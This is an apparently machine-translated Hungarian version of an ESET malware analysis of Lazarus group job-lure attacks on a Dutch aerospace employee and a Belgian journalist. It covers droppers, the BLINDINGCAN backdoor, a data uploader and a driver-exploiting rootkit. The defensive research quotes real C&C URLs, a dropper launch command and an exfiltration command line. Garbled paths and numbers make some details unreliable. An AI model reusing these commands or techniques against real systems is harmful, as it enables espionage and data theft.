Lazarus Amazon-témájú kampányai Hollandiában és Belgiumban

Az ESET kutatói egy sor rosszindulatú eszközt fedeztek fel és elemeztek, amelyeket a hírhedt Lazarus APT csoport használt támadásokhoz 2021 őszén. A kampány rosszindulatú Amazon témájú dokumentumokat tartalmazó e-mailekkel indult, és egy hollandiai repülőgépipari vállalat alkalmazottját célozta meg. és politikai újságíró Belgiumban. A támadók elsődleges célja az adatok kiszűrése volt. A Lazarus (más néven HIDDEN COBRA) legalább 2009 óta aktív. Felelős olyan nagy horderejű eseményekért, mint pl. Sony Pictures Entertainment hack és több tízmillió dollárt kiberheisták 2016-ban, a WannaCryptor (más néven WannaCry) járvány 2017-ben, és az ellen irányuló támadások hosszú története Dél-Korea nyilvános és kritikus infrastruktúrája legalább 2011 óta.

Mindkét célszemélyt állásajánlattal mutatták be – a holland alkalmazott a LinkedIn Messaging-en keresztül, a belga személy pedig e-mailben kapott egy dokumentumot. A támadások azután kezdődtek, hogy ezeket a dokumentumokat felnyitották. A támadók minden rendszeren több rosszindulatú eszközt telepítettek, köztük droppereket, betöltőket, teljes értékű HTTP(S) hátsó ajtókat, HTTP(S) feltöltőket és letöltőket. A dropperek közös jellemzője az volt, hogy trójai, nyílt forráskódú projektek, amelyek dekódolják a beágyazott hasznos adatot modern blokkrejtjelekkel, és hosszú kulcsokat adnak át parancssori argumentumként. Sok esetben a rosszindulatú fájlok olyan DLL-összetevők, amelyeket legitim EXE-k oldalról töltöttek be, de a fájlrendszer szokatlan helyéről.

A támadók által szállított legfigyelemreméltóbb eszköz egy felhasználói módú modul volt, amely a kernelmemória olvasására és írására is képes lett. CVE-2021 21551- sérülékenység egy legitim Dell-illesztőprogramban. Ez az első feljegyzett visszaélés ezzel a sebezhetőséggel vadon. A támadók ezután a kernelmemória írási hozzáférését használták fel, hogy letiltsák a Windows operációs rendszer által kínált hét olyan mechanizmust, amelyet a műveletek megfigyelésére kínálnak, mint például a rendszerleíró adatbázist, a fájlrendszert, a folyamatok létrehozását, az eseménykövetést stb., ami alapvetően nagyon általános és robusztus módon vakította el a biztonsági megoldásokat.

Ebben a blogbejegyzésben elmagyarázzuk a kampány kontextusát, és részletes technikai elemzést adunk az összes összetevőről. Ezt a kutatást az idei rendezvényen mutatták be Virus Bulletin konferencia. Az eredetiség miatt a prezentáció középpontjában a támadás során használt rosszindulatú összetevő áll, amely a Bring Your Own Vulnerable Driver (BYOVD) technikát használja, és kihasználja a fent említett CVE-2021-21551 biztonsági rést. Részletes információk a fehér könyvben találhatók Lazarus & BYOVD: Gonosz a Windows magjáig.

Ezeket a támadásokat nagy biztonsággal a Lazarusnak tulajdonítjuk, az adott modulok, a kód-aláíró tanúsítvány és a korábbi Lazarus kampányokhoz hasonló behatolási megközelítés alapján, mint pl. In(ter)ception művelet  és a A DreamJob hadművelet. A Lazarus kampányok sokszínűsége, száma és excentricitása határozza meg ezt a csoportot, valamint az, hogy a kiberbűnözés mindhárom pillérét végrehajtja: a kiberkémkedést, a kiberszabotázst és az anyagi haszonszerzést.

Kezdeti hozzáférés

Az ESET kutatói két új támadást fedeztek fel: egyet egy belgiumi sajtóorgánum személyzete ellen, egyet pedig egy hollandiai repülőgépipari vállalat alkalmazottja ellen.

Hollandiában a támadás a vállalati hálózathoz csatlakoztatott Windows 10-es számítógépet érintette, ahol a LinkedIn Messagingen keresztül felvették a kapcsolatot egy alkalmazottal egy feltételezett potenciális új munkával kapcsolatban, aminek eredményeként egy e-mailt küldtek egy dokumentummelléklettel. Felvettük a kapcsolatot az érintett cég biztonsági szakemberével, aki meg tudta osztani velünk a rosszindulatú dokumentumot. A Word fájl Amzon_Netherlands.docx A célpontnak küldött vázlatos dokumentum csupán egy Amazon logóval (lásd az 1. ábrát). Megnyitáskor a távoli sablon https://thetalkingcanvas[.]com/thetalking/globalcareers/us/5/careers/jobinfo.php?image=_DO.PROJ (hol egy hétjegyű szám) lekérésre kerül. A tartalmat nem tudtuk megszerezni, de feltételezzük, hogy állásajánlatot tartalmazhatott az Amazon űrprogramjához, Kuiper projekt. Ez egy olyan módszer, amelyet Lázár a In(ter)ception művelet és a A DreamJob hadművelet repülési és védelmi ipart megcélzó kampányok.

1. ábra: Amazon témájú dokumentum, amelyet Hollandiába küldtek a célpontnak

Órákon belül számos rosszindulatú eszköz került a rendszerbe, köztük dropperek, betöltők, teljes értékű HTTP(S) hátsó ajtók, HTTP(S) feltöltők és HTTP(S) letöltők; lásd az Eszközkészlet részt.

A belgiumi támadással kapcsolatban egy újságíró cég alkalmazottját (akinek e-mail címe nyilvánosan elérhető volt a cég honlapján) e-mailben keresték meg a csalittal. AWS_EMEA_Legal_.docx csatolt. Mivel a dokumentumot nem kaptuk meg, csak a nevét ismerjük, ami arra utal, hogy jogi pozícióban tett állásajánlatot. A dokumentum megnyitása után a támadás elindult, de az ESET-termékek azonnal leállították, egyetlen rosszindulatú végrehajtható fájl is érintett. Az érdekesség itt az, hogy akkoriban ez a bináris kód érvényesen alá volt írva egy kód-aláíró tanúsítvánnyal.

tulajdonság

Mindkét támadást a Lazarus csoportnak tulajdonítjuk, nagy magabiztossággal. Ez a következő tényezőkön alapul, amelyek más Lazarus-kampányokhoz való viszonyt mutatnak:

1. Rosszindulatú program (a behatoló készlet):
   1. A HTTPS hátsó ajtó (SHA-1: 735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2) erős hasonlóságokat mutat a BLINDINGCAN hátsó ajtóval CISA (US-CERT), és a HIDDEN COBRA-nak tulajdonítják, ami a Lazarus kódnevük.
   2. A HTTP(S) feltöltő erős hasonlóságot mutat az eszközzel C:ProgramDataIBM~DF234.TMP a A HvS Consulting beszámolója, 2.10. szakasz Kiszűrés.
   3. A teljes fájl elérési útja és neve, %ALLUSERSPROFILE%AdobeAdobe.tmp, megegyezik azzal, amelyről a Kaspersky 2021 februárjában egy fehér könyvben számolt be Lazarusról. A ThreatNeedle művelet, amely a védelmi ipart célozza meg.
   4. A kód-aláíró tanúsítvány, amelyet az amerikai cégnek adtak ki „A” EGÉSZSÉGÜGYI HIVATAL, PLLC és az egyik cseppentő aláírására használták, szintén bejelentették a biztonsági kutatók elleni kampány; lásd még: Lázár csoport: 2 JÁTÉKSÁV kampány, ESET Fenyegetés jelentés 2021 T1, 11. oldal.
   5. A Lazarus kampány eszközeiben egy szokatlan típusú titkosítást használtak: a HC-128-at. Más kevésbé elterjedt titkosítások, amelyeket Lazarus használt a múltban: az RC4 Spritz változata a lengyel és mexikói bankok elleni támadások; később Lazarus módosított RC4-et használt In(ter)ception művelet; -ben módosított A5/1 adatfolyam titkosítót használtak WIZVERA VeraPort ellátási lánc támadás.
2. Infrastruktúra:
   1. Az első szintű C&C szervernél a támadók nem saját szervereiket használják, hanem a meglévőket törik fel. Ez Lázár tipikus, de gyenge magabiztossága.

eszközkészlet

A Lazarus egyik tipikus vonása, hogy a végső hasznos terhet két vagy három szakaszból álló sorozat formájában szállítja. Egy dropperrel kezdődik – általában egy trójai, nyílt forráskódú alkalmazás –, amely dekódolja a beágyazott rakományt egy modern blokkrejtjellel, mint például az AES-128 (ami nem szokatlan a Lazarus esetében, pl. Művelet Bookcodes, vagy egy obfuszkált XOR, miután elemezte a parancssori argumentumokat egy erős kulcshoz. Annak ellenére, hogy a beágyazott hasznos adatot nem dobják a fájlrendszerbe, hanem közvetlenül a memóriába töltik be és hajtják végre, az ilyen rosszindulatú programokat dropperként jelöljük. Azokat a rosszindulatú programokat, amelyek nem rendelkeznek titkosított pufferrel, de egy fájlrendszerből töltenek be hasznos adatokat, betöltőnek nevezzük.

Lehet, hogy a cseppentőket (1. táblázat) vagy nem (2. táblázat) egy legitim (Microsoft) folyamat oldalról tölti be. Az első esetben a legitim alkalmazás szokatlan helyen van, és a rosszindulatú összetevő az alkalmazás importált termékei között található megfelelő DLL nevét viseli. Például a rosszindulatú DLL coloui.dll oldalról tölti be egy legitim rendszeralkalmazás Color Control Panel (colorcpl.exe), mindkettő a címen található C:ProgramDataPTC. Ennek a törvényes alkalmazásnak azonban a szokásos helye az %WINDOWS%Rendszer32.

Minden esetben legalább egy parancssori argumentum kerül átadásra futás közben, amely külső paraméterként szolgál a beágyazott hasznos adat visszafejtéséhez. Különféle visszafejtési algoritmusokat használnak; lásd az 1. és 2. táblázat utolsó oszlopát. Számos esetben, amikor AES-128-at használnak, van egy belső, keménykódolt paraméter is a szülőfolyamat nevével és a DLL nevével együtt, amelyek mind szükségesek a sikeres visszafejtéshez.

1. táblázat: Egy törvényes folyamat által oldallagosan betöltött rosszindulatú DLL-ek szokatlan helyről

2. táblázat: A támadásban érintett egyéb rosszindulatú programok

A sikeres visszafejtés után a rendszer ellenőrzi a puffer megfelelő PE formátumát, és a végrehajtást átadja neki. Ez az eljárás a legtöbb csepegtetőben és rakodóban megtalálható. Ennek eleje a 2. ábrán látható.

2. ábra. A visszafejtett puffer egy 64 bites végrehajtható fájl

HTTP(S) hátsó ajtó: BLINDINGCAN

A támadás során azonosítottunk egy teljes értékű HTTP(S) hátsó ajtót – egy BLINDINGCAN néven ismert RAT-ot.

Ennek a rakománynak a csepegtetőjét a következőképpen hajtották végre %ALLUSERSPROFILE%PTCcolorui.dll; részletekért lásd az 1. táblázatot. A rakomány kinyerése és visszafejtése egyszerű XOR használatával történik, de egy hosszú kulccsal, ami a szülőfolyamat nevének összefűzésével felépített karakterlánc, a saját fájlnév és a külső parancssori paraméter – itt COLORCPL.EXECOLORUI.DLLBE93E050D9C0EAEB1F0E6AE13C1595B5.

A hasznos teher, SHA-1: 735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2, egy 64 bites VMProtect-tel ellátott DLL. A kapcsolat létrejön az egyik távoli helyhez https://aquaprographix[.]com/patterns/Map/maps.php or https://turnscor[.]com/wp-includes/feedback.php. A virtualizált kódon belül a következő nagyon specifikus RTTI-műtermékeket használtuk a végrehajtható fájlban: .?AVCHTTP_Protocol@@, .?AVCFileRW@@. Sőt, van hasonlóság kódszinten, mivel a parancsok indexei ugyanazzal az értékkel kezdődnek, 8201; lásd a 3. ábrát. Ez segített nekünk azonosítani ezt a patkányt, mint BLINDINGCAN (SHA-1: 5F4FBD57319BD0D2DF31131E864FDDA9590A652D) jelentette először CISA. Ennek a rakománynak a legújabb verzióját egy másik Amazon témájú kampányban figyelték meg, ahol a BLINDINGCAN-t egy trójai Putty-0.77 kliens dobta ki: lásd a Mandiant blogját.

A kezelő rendelkezésére álló parancskódok száma alapján valószínű, hogy elérhető egy szerveroldali vezérlő, ahol a kezelő vezérelheti és feltárhatja a kompromittált rendszereket. A vezérlőn belül végrehajtott műveletek valószínűleg azt eredményezik, hogy a megfelelő parancsazonosítók és azok paraméterei elküldésre kerülnek a célrendszeren futó RAT-nak. A parancskódok listája a 3. táblázatban található, és megegyezik az általa végzett elemzéssel JPCERT/CC, C. függelék. A paraméterek, például a mappák vagy a fájlnevek ellenőrzésére nincs lehetőség. Ez azt jelenti, hogy minden ellenőrzést a szerver oldalon kell végrehajtani, ami arra utal, hogy a szerveroldali vezérlő egy összetett alkalmazás, nagy valószínűséggel felhasználóbarát grafikus felülettel.

3. táblázat: A RAT parancsai

Köztes rakodó

Most egy háromlépcsős láncot írunk le, ahol sajnos csak az első két lépést tudtuk azonosítani: egy cseppentőt és egy köztes rakodót.

Az első szakasz egy cseppentő, amely a címen található C:WindowsVsscredui.dll és egy legitim – de a DLL-keresési sorrend eltérítésével szemben sebezhető – alkalmazáson keresztül futott a (külső) paraméterrel C:WindowsVssWFS.exe A39T8kcfkXymmAcq. A program WFS.exe a Windows Fax and Scan alkalmazás másolata, de szabványos helye az %WINDOWS%Rendszer32.

A dropper egy trójai GOnpp beépülő modul a Go programozási nyelven írt Notepad++ számára. A visszafejtés után a dropper ellenőrzi, hogy a puffer érvényes 64 bites futtatható-e, majd ha igen, betölti a memóriába, így a második szakasz készen áll a végrehajtásra.

Ennek a köztes szakasznak a célja egy további hasznos adat betöltése a memóriába és végrehajtása. Ezt a feladatot két lépésben hajtja végre. Először beolvassa és visszafejti a konfigurációs fájlt C:windowsSystem32wlansvc.cpl, amely nem egy (titkosított) futtatható fájl, ahogyan a kiterjesztése sugallhatja, hanem egy adatfájl, amely 14944 bájt konfigurációval. Nem rendelkezünk konkrét adatokkal a jelenlegi támadásról; azonban ilyen konfigurációt kaptunk egy másik Lazarus támadásból: lásd az 5. ábrát. A konfiguráció várhatóan egy dupla szóval kezdődik, amely a fennmaradó puffer teljes méretét jelenti (lásd lent a 69. ábra 4. sorát és a változót u32TotalSize), majd egy tömb következik 14944 bájt hosszúságú struktúrák, amelyek legalább két értéket tartalmaznak: a betöltő DLL neve helyőrzőként a konfiguráció többi részének azonosításához (a 168. ábrán a 74. sor 4 eltolásánál és az 5. ábrán a kiemelt tagnál).

4. ábra: A konfigurációs fájl visszafejtésének első lépése és annak ellenőrzése, hogy a betöltő DLL neve megegyezik-e a várttal

A második lépés a fájl beolvasása, visszafejtése és betöltése, amely nagy valószínűséggel a harmadik és egyben utolsó szakaszt jelenti. Várhatóan 64 bites futtatható fájl, és ugyanúgy betöltődik a memóriába, ahogy az első fokozatú dropper kezelte a közbenső betöltőt. A végrehajtás elején egy mutex jön létre a karakterlánc összefűzéseként GlobalAppCompatCacheObject és a DLL nevének CRC32 ellenőrző összege (credui.dll) előjeles egész számként ábrázolva. Az értéknek egyenlőnek kell lennie GlobalAppCompatCacheObject-1387282152 if wlansvc.cpl létezik és -1387282152 másképp.

5. ábra: A közbenső rakodó konfigurációja. A kiemelt fájlnévnek meg kell egyeznie a futó rosszindulatú program nevével; lásd még a 4. ábrát.

Érdekes tény ennek a visszafejtési algoritmusnak a használata (4. ábra, 43. és 68. sor), amely nem annyira elterjedt a Lazarus eszközkészletben, sem általában a rosszindulatú programokban. Az állandók 0xB7E15163 és a 0x61c88647 (ami -0x9E3779B9; lásd: 6. ábra, 29. és 35. sor). a kulcskiterjesztés azt sugallja, hogy ez vagy az RC5 vagy RC6 algoritmus. Az algoritmus fő visszafejtési hurkának ellenőrzésével megállapítható, hogy ez a kettő közül a bonyolultabb, az RC6. Az ilyen szokatlan titkosítást használó kifinomult fenyegetésekre példa az Equations Group BananaUsurperje; lát Kaspersky jelentése a 2016.

6. ábra: RC6 kulcsbővítése

HTTP(S) letöltő

Egy HTTP(S) protokollt használó letöltő is bekerült a célpont rendszerébe.

Egy első fokozatú cseppentővel (SHA1: 001386CBBC258C3FCC64145C74212A024EAA6657), amely egy trójai libpcre-8.44 könyvtár. A parancs végrehajtotta

cmd.exe /c start /b rundll32.exe C:PublicCachemsdxm.ocx,sCtrl 93E41C6E20911B9B36BC

(a paraméter egy XOR kulcs a beágyazott hasznos adat kibontásához; lásd a 2. táblázatot). A cseppentő a tartósságot is eléri azáltal, hogy létrehozza a OneNoteTray.LNK fájl található a %APPDATA%MicrosoftWindowsStart MenuProgramsStartup mappát.

A második szakasz egy 32 bites VMProtect-ed modul, amely HTTP-kapcsolati kérelmet küld a konfigurációjában tárolt C&C kiszolgálóhoz; lásd: 7. ábra. Ugyanazt a felhasználói ügynököt használja – Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36 – mint BLINDINGCAN RAT, az RTTI műterméket tartalmazza .?AVCHTTP_Protokoll@@ de nem .?AVCFileRW@@, és hiányoznak az olyan funkciók, mint a képernyőképek készítése, a fájlok archiválása vagy a parancsok parancssoron keresztüli végrehajtása. Képes betölteni egy végrehajtható fájlt egy újonnan lefoglalt memóriablokkba, és kódvégrehajtást átadni neki.

7. ábra: A HTTP(S) letöltő konfigurációja. A kiemelt értékek a konfiguráció mérete és az URL-ek száma. Az általunk megfigyelt támadás során az összes URL azonos volt.

HTTP(S) feltöltő

Ez a Lazarus eszköz felelős az adatok kiszűréséért, HTTP vagy HTTPS protokollok használatával.

Szállítása is két lépcsőben történik. A kezdeti cseppentő egy trójai sqlite-3.31.1 könyvtár. A Lazarus minták általában nem tartalmaznak PDB elérési utat, de ez a betöltő rendelkezik egy W:DevelopToolHttpUploaderHttpPOSTPro_BINRUNDLL64sqlite3.pdb, amely azonnali működését is sugallja – egy HTTP-feltöltő.

A dropper több parancssori paramétert vár: ezek egyike a beágyazott rakomány visszafejtéséhez és betöltéséhez szükséges jelszó; a többi paraméter átadásra kerül a hasznos terhelésnek. A paramétereket nem kaptuk meg, de szerencsére ennek az eszköznek a szabadban történő használatát észlelték egy törvényszéki vizsgálat során. HvS Consulting:

C:ProgramDataIBM~DF234.TMP S0RMM-50QQE-F65DN-DCPYN-5QEQA https://www.gonnelli.it/uploads/catalogo/thumbs/thumb.asp C:ProgramDataIBMrestore0031.dat data03 -10000 192.168.1.240p8080.

Az első paraméter, S0RMM-50QQE-F65DN-DCPYN-5QEQA, a dropper dekódolási rutinjának kulcsaként működött (pontosabban, először egy obfuszkálást hajtottak végre, ahol a titkosított puffert XOR-re hajtottuk, a másolata egy bájttal el lett tolva, majd XOR dekódolás következett a kulccsal). A többi paraméter egy struktúrában tárolódik, és átkerül a második szakaszba. Jelentésük magyarázatát lásd a 4. táblázatban.

4. táblázat: A HTTP(S) frissítő parancssori paraméterei

A második szakasz maga a HTTP-feltöltő. Ennek a szakasznak az egyetlen paramétere egy olyan struktúra, amely tartalmazza a kiszűréshez szükséges C&C szervert, a helyi RAR archívum fájlnevét, a szerveroldali RAR archívum gyökérnevét, a RAR teljes méretét kilobájtban felosztva, egy opcionális osztott indexek tartománya, és egy opcionális -p kapcsoló a belső proxy IP-címével és egy porttal; lásd a 4. táblázatot. Például, ha a RAR archívum 88 darabra van felosztva, mindegyik 10,000 XNUMX kB nagyságú, akkor a feltöltő elküldi ezeket a részeket, és eltárolja a szerver oldalon nevek alatt data03.000000.avi, data03.000001.avi, ..., data03.000087.avi. Lásd a 8. ábra 42. sorát, ahol ezek a karakterláncok formázva vannak.

A User-Agent ugyanaz, mint a BLINDINGCAN és a HTTP(S) letöltő esetében,  Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36.

8. ábra: A RAR kiszűrése egy C&C szerverre

FudModule Rootkit

Egy dinamikusan összekapcsolt könyvtárat azonosítottunk FudModule.dll belső névvel, amely megpróbálja letiltani a Windows különféle megfigyelési funkcióit. Ezt a kernelváltozók módosításával és a kernel-visszahívások eltávolításával teszi, ami azért lehetséges, mert a modul a BYOVD technikák – a specifikus CVE-2021 21551- A dbutil_2_3.sys Dell illesztőprogram biztonsági rése.

A rosszindulatú program teljes elemzése VB2022 papírként érhető el Lazarus & BYOVD: gonosz a Windows magjáig.

Egyéb rosszindulatú programok

A támadásokban további droppereket és betöltőket fedeztek fel, de nem szereztük meg a szükséges paramétereket a beágyazott rakományok vagy a titkosított fájlok visszafejtéséhez.

Trojanizált lecui

Egy projekt Lecui – Alec Musafa kódbázisként szolgált a támadók számára két további betöltő trojanizálásához. Fájlnevük alapján Microsoft-könyvtárnak álcázták őket mi.dll (Management Infrastructure) és cryptsp.dll (Cryptographic Service Provider API), és ez a legitim alkalmazások általi szándékolt oldalbetöltésnek köszönhető. wsmprohost.exe és a SMSvcHost.exe, ill. lásd az 1. táblázatot.

Ezeknek a betöltőknek a fő célja a benn található végrehajtható fájlok olvasása és visszafejtése alternatív adatfolyamok (ADS) at C:ProgramDataCaphyonmi.dll:Zone.Identifier és a C:ProgramfájlokWindows Media PlayerSkinsDarkMode.wmz:Zone.Identifier, ill. Mivel ezeket a fájlokat nem szereztük be, nem ismert, hogy melyik rakomány van elrejtve ott; azonban az egyetlen bizonyosság az, hogy végrehajtható, mivel a betöltési folyamat követi a visszafejtést (lásd 2. ábra). Az ADS használata nem új keletű, mert az Ahnlab a Lázár támadása dél-koreai cégek ellen 2021 júniusában ilyen technikákkal.

Trójai ujjszöveg

Az ESET blokkolt egy további trójai, nyílt forráskódú alkalmazást, FingerText 0.5.61, készítette: erinata, található %WINDIR%securitycredui.dll. A megfelelő parancssori paraméterek nem ismertek. A korábbi esetekhez hasonlóan három paraméterre volt szükség a beágyazott hasznos adat AES-128 dekódolásához: a szülőfolyamat neve, WFS.exe; a belső paraméter, mg89h7MsC5Da4ANi; és a hiányzó külső paraméter.

Trójai sslSniffer

A belgiumi célpont elleni támadást a telepítési lánc elején blokkolták, így csak egy fájlt azonosítottak, egy 32 bites droppert a C:PublicCachemsdxm.ocx. Ez egy sslSniffer komponens a farkasSSL trójai projektet. A támadás idején érvényesen aláírták a címre kiállított tanúsítvánnyal „A” EGÉSZSÉGÜGYI HIVATAL, PLLC (lásd 8. ábra), amely azóta lejárt.

9. ábra Érvényesen aláírt, de már lejárt tanúsítvány

Két rosszindulatú exportja van, amelyekkel a törvényes DLL nem rendelkezik: SetOfficeCertInit és a SetOfficeCert. Mindkét exportáláshoz pontosan két paraméter szükséges. Az első export célja a perzisztencia megteremtése létrehozással OfficeSync.LNK, található %APPDATA%MicrosoftWindowsStart MenuProgramsStartup, rámutat a rosszindulatú DLL-re, és futtatja a második exportálást a rundll32.exe fájlon keresztül a saját magának átadott paraméterekkel.

A második export, SetOfficeCert, az első paramétert használja kulcsként a beágyazott hasznos adat visszafejtéséhez, de nem tudtuk kibontani, mert a kulcsot nem ismerjük.

A visszafejtő algoritmus is érdekes, mivel a támadók használják HC-128 a 128 bites kulccsal az első paraméterrel és a 128 bites inicializálási vektorral a karakterlánc ffffffffffffffffff. A titkosítást feltáró állandók a 10. ábrán láthatók.

10. ábra: A kulcsbeállítás kiemelt konstansokkal, amelyek a HC-128 titkosításra utalnak

Következtetés

Ennél a támadásnál, valamint sok más, Lazarusnak tulajdonított támadásnál azt láttuk, hogy sok eszközt még egyetlen célzott végponton is elosztottak az érdeklődésre számot tartó hálózaton. Kétségtelen, hogy a támadás mögött álló csapat meglehetősen nagy, szisztematikusan szervezett és jól felkészült. A támadók a vadonban először tudták a CVE-2021-21551 jelet felhasználni az összes biztonsági megoldás felügyeletének kikapcsolására. Ez nem csak a kerneltérben készült, hanem robusztus módon is, egy sor kevés vagy nem dokumentált Windows-belső felhasználásával. Ehhez kétségtelenül mélyreható kutatási, fejlesztési és tesztelési készségekre volt szükség.

A védők szemszögéből könnyebbnek tűnik korlátozni a kezdeti hozzáférés lehetőségeit, mint blokkolni azt a robusztus eszközkészletet, amely akkor kerül telepítésre, ha az elszánt támadók megveszik a lábukat a rendszerben. Mint a múltban sok esetben, itt is a támadók csábításának áldozatául esett alkalmazott jelentette a kezdeti kudarcot. Az érzékeny hálózatokban a vállalatoknak ragaszkodniuk kell ahhoz, hogy az alkalmazottak ne hajtsák végre személyes programjaikat, például álláskeresést a vállalatuk infrastruktúrájához tartozó eszközökön.

IoCs

A kompromisszummutatók és a minták átfogó listája megtalálható a mi oldalunkon GitHub tárolóból.

Hálózat

MITER ATT&CK technikák

Ez a táblázat felhasználásával készült 11 verzió a MITER ATT&CK keretrendszer.

Referenciák

Ahnlab. Elemző jelentés a Lazarus Group Rootkit-támadásáról a BYOVD használatával. Vers. 1.0. 22. szeptember 2022. Letöltve az AhnLab Security Emergency Response Centerből.

Ahnlab. (2021, június 4.). Az APT könyvtári fájlok segítségével támadja meg a hazai vállalatokat. Letöltve az AhnLab Security Emergency Response Centerből.

Ahnlab. (2022, szeptember 22.). Elemző jelentés a Lazarus Group Rootkit-támadásáról a BYOVD használatával. Letöltve az AhnLab Security Emergency Response Centerből.

Breitenbacher, D. és Kaspars, O. (2020, június). In(ter)ception művelet: Repülési és katonai vállalatok a kiberkémek célkeresztjében. Letöltve a WeLiveSecurity.com webhelyről.

ClearSky kutatócsoport. (2020, augusztus 13.). Az „Álommunka” hadművelet széles körű észak-koreai kémkampány. Letöltve a ClearSky.com webhelyről.

Dekel, K. (nd). Sentinel Labs biztonsági kutatás. CVE-2021-21551 – Dell-számítógépek százmilliói vannak veszélyben a többszörös BIOS-illesztőprogram-jogosultság eszkalációs hibái miatt. Letöltve a SentinelOne.com webhelyről.

ESET. (2021, június 3.). ESET Fenyegetés jelentés T 1 2021. Letöltve a WeLiveSecurity.com webhelyről.

Nagy. (2016, augusztus 16.). Az egyenlet ajándéka. Letöltve a SecureList.com webhelyről.

HvS-Consulting AG. (2020. december 15.). Üdvözlet Lázártól: Egy kiberkémkedés anatómiája. Letöltve a hvs-consulting.de webhelyről.

Cherepanov, A., & Kálnai, P. (2020, november). Lazarus támadás az ellátási lánc ellen Dél-Koreában. Letöltve a WeLiveSecurity.com webhelyről.

Kálnai, P. (2017, 2 17). A lengyel bankok ellen használt, célzott rosszindulatú programok megfejtése. (ESET) Letöltve a WeLiveSecurity.com webhelyről.

Kopeytsev, V. és Park, S. (2021, február). A Lazarus a védelmi ipart veszi célba a ThreatNeedle segítségével. (Kaspersky Lab) Letöltve a SecureList.com webhelyről.

Lee, T.-w., Dong-wook és Kim, B.-j. (2021). Operation BookCode – Dél-Korea célzása. Vírus Bulletin. helyi kiszolgáló. Letöltve a vblocalhost.com webhelyről.

Maclachlan, J., Potaczek, M., Isakovic, N., Williams, M., & Gupta, Y. (2022, szeptember 14). Itt az ideje a PuTTY-nak! KNDK álláslehetőségek adathalászata a WhatsApp-on keresztül. Letöltve a Mandiant.com webhelyről.

Tomonaga, S. (2020, szeptember 29.). BLINDINGCAN – Lazarus által használt rosszindulatú program. (JPCERT/CC) Letöltve a blogs.jpcert.or.jp webhelyről.

US-CERT CISA. (2020, augusztus 19.). MAR-10295134-1.v1 – Észak-koreai távelérési trójai: BLINDINGCAN. (CISA) Letöltve a cisa.gov webhelyről.

Weidemann, A. (2021, 1 25). Új kampány a biztonsági kutatóknak. (Google Threat Analysis Group) A blog.google webhelyről letöltve.

Wu, H. (2008). A Stream Cipher HC-128. In M. Robshaw és O. Billet , Új Stream Cipher Designs (4986. kötet). Berlin, Heidelberg: Springer. Letöltve a doi.org webhelyről.